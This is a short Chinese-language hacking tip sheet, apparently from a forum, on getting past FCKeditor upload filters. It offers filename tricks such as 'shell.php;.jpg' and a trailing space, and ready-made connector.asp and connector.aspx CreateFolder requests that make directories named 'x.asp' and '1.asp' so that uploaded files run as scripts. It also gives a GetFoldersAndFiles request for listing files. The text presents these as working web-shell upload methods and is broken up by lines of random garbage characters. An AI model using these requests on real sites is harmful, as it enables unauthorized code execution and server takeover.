很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
. s1 b( c: S* h- k
$ R8 H2 Z% t5 B$ \% Z' E, ~提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。0 A# P. V* a$ z' t: w- G/ h
+ T1 S& S* h& L, s g, G
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。7 N4 F( }3 K n; R$ K3 }: {. m+ ^1 n; t
+ p, S" {- U+ R% \突破建立文件夹:
9 V( r4 {' w! e: ] G; r7 Z0 H' \7 p6 r3 ?2 v: `0 _5 Z- ]2 f/ V
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp4 I0 D8 {. e" r& n, y
e& \, C5 Y4 h( R参数:
9 k/ T0 L9 y! u x6 o1 H
8 q$ `; \, y4 E$ z& G+ u, h2 `当前目录名:CurrentFolder=/qing.asp" \+ s' W3 r% ], m6 R! B& B7 F
; E4 b; D+ c! {( k: A/ E @0 q j新的目录名:NewFolderName=x.asp
0 ~6 O; z" A7 Z6 O
' X" z5 ?' {$ x, K8 K其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……% X6 g* [6 n9 Z! L; k6 ?8 e) N
; \* s: e- R8 E那么 x.asp 就已经建立生成了,此方法百试百灵!/ q' h c. ]3 q! p) s4 V# U5 g8 _
" y3 {4 k6 Z9 ^4 K( T新建文件夹参数 x.asp,基本都能搞定。
& f4 R; q! P- E$ r/ P2 B" ~, ^/ }7 Y7 k3 ^& n* A2 l7 H
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建2 G5 o, y) _9 v1 Q
2 E1 j8 K9 s+ ^4 _2 K
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp' w* \( p0 {. l; X3 m5 t
! @- u/ L7 u4 Z( o获取文件列表1 K/ T: w# |4 {, K/ X; I9 H8 Q- ~
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F# }) f! A2 e/ a' _; Q _
+ s' a7 M" o# {! M+ {4 }- e1 C( g+ e |